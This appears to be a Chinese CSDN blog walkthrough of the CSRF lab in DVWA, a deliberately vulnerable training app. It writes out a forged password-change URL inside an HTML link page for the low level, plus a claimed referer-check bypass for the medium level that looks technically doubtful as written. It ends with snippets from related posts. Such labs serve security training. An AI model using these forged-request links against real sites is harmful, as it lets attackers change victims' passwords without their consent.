DVWA-CSRF

最新推荐文章于 2023-01-13 11:58:11 发布
最新推荐文章于 2023-01-13 11:58:11 发布
阅读量183 收藏
点赞数
分类专栏: DVWA CSRF 文章标签: csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51855956/article/details/115143589
版权
DVWA 同时被 2 个专栏收录
1 篇文章 0 订阅
订阅专栏
CSRF
1 篇文章 0 订阅
订阅专栏

DVWA-CSRF(跨站请求伪造攻击)

开始前先查看要进行被csrf漏洞注入的客户机的IP
在这里插入图片描述

如图为10.212.63.93

low
用kali进行攻击,打开kali终端
netstat -ntulp | grep 80 //查看所有80端口使用情况
service apache2 start //启动阿帕奇
在这里插入图片描述

打开阿帕奇后在浏览器URL栏中输入被攻击客户端的IP可进入DVWA
在这里插入图片描述

将被攻击端和攻击端都调到low,在CSRF修改密码栏中输入自己想进行攻击修改的密码,进行burpsuite抓包,复制DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change
关闭浏览器代理放包
在这里插入图片描述

再次打开终端输入ifconfig查看IP为192.168.75.131,输入gedit 1.html创建一个1.html文件,在文件内写入
<a href='http://192.168.75.131/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change'>csrf</a>在1.html下创建一个超链接
回到浏览器在URL栏中输入192.168.75.131/1.html,可以看到链接csrf,点进去重进进入DVWA,这时以改过密码
在这里插入图片描述

Medium
查看源代码
在这里插入图片描述

多了if判断,对本机服务进行了判断,只接受本机地址,绕过只需在链接中添加127.0.0.1

<a href='http://192.168.75.131/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change127.0.0.1'>csrf</a>

其余步骤与上面均相同

加载成功中
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dvwacsrf
qq_17762247的博客
05-15 363
一、简介 CSRF是指在受害人不知情的情况下,以其身份向服务器发送服务器发送请求,从而执行非法操作(转账,改密等)。以转账为例,受害人A使用浏览器登录某银行网站B完成查看余额操作后,在未退出的情况下访问了攻击网站C,C利用浏览器中的Session伪造转账请求发送给B,由于B发现该转账请求包含用户登录信息,转账成功。Cross-site是指受害者在访问网站C时给网站B发送了请求,request forgery是指该请求是网站C伪造的,并不是A的本意。 二、Low 1、服务器端代码 <?php if(
DVWA-master.7z 压缩包
最新发布
09-14
- 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非预期的操作。 - 文件包含漏洞:允许攻击者将外部文件内容包含到应用中,可能导致代码执行或信息泄露。 - 弱认证与会话管理:不安全的登录机制或...
DVWACSRF
RexHa的博客
09-30 7548
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
dvwa csrf
一个安全研究员
05-17 625
科普 csrf就是江湖中的借刀杀人,这里的刀就是用户的cookie,例如:当一个用户登陆了某个系统时,该用户就持有了这个系统分发给他的会话,然后csrf这个漏洞就是我们可以利用这个会话来伪造请求。具体的利用方法,我将通过dvwa中的实例来讲解。 low 虽然我们的dvwa中比起真实的环境差了太多,但是我们可以假设我们现在处于一个真实的环境中,我们打开csrf页面,可以看到是一个改密的页面: ...
DVWA-master.zip
01-04
除了上述常见漏洞外,DVWA还包括如“弱口令”、“CSRF(跨站请求伪造)”、“不安全的直接对象引用”等其他安全挑战,这些都为学习者提供了全面的安全训练。 7. **实践与挑战** 通过DVWA,你可以模拟黑客的攻击...
DVWA-master安装包
02-28
3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或转账,因为请求看起来像是来自用户自己。 4. **文件包含漏洞**:当程序允许用户指定要加载的文件时,不正确的验证可能导致恶意文件被...
DVWA-2.0.1
09-23
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,旨在为安全专业人员提供一个环境,以便在受控环境中学习和实践网络安全测试技术。DVWA 2.0.1是该应用的一个版本,包含了多种常见的Web应用漏洞,...
DVWA CSRF
m0_73606240的博客
01-13 190
DVWA CSRF
dvwa-csrf
Alter__的博客
04-23 398
(元素可提供有关页面的元信息,比如针对搜索引擎和更新频度的描述和关键词) (关联css文件) (role充当什么角色nav?)
DVWA-csrf
Darklord.W
04-09 193
低 构造修改密码的链接: 写一个修改密码的脚本文件,访问该页面就可以修改密码: 复制到kali中并开启apache服务 重置数据库密码,并用其他虚拟机访问kali脚本 此时便可以用修改后的密码登录dvwa 构造攻击页面需要事先在公网上传一个攻击页面,诱骗受害者去访问,真正能够在受害者不知情的情况下完成CSRF攻击 中 以通过抓包将主机名放在h...
dvwaCSRF
Alsn86的博客
02-05 369
dvwaCSRF 是一个修改密码的功能 把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change CSRF之low等级 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G
dvwacsrf
温和的跳跃
10-14 246
没有什么好玩的, 就把这个缩写记住了 cross site request 伪造。然后打算用bp 服务器模拟了一下。早点test完dvwa。 下图比较好玩。 哈哈哈哈哈哈哈哈哈哈 这和程序员新学一个语言或者框架写个helloworld很像。异曲同工 ...
新手指南:DVWA全级别教程之CSRF
g695144224的博客
08-09 2795
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
复现关于dvwaCSRF-token绕过实验
05-05
DVWA中,我们可以通过修改一个cookie来绕过CSRF-token。 下面是具体的攻击步骤: 1. 打开DVWA,登录并进入CSRF实验页面。 2. 在Chrome浏览器中打开开发者工具,切换到“Network”选项卡,勾选“Preserve log”...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值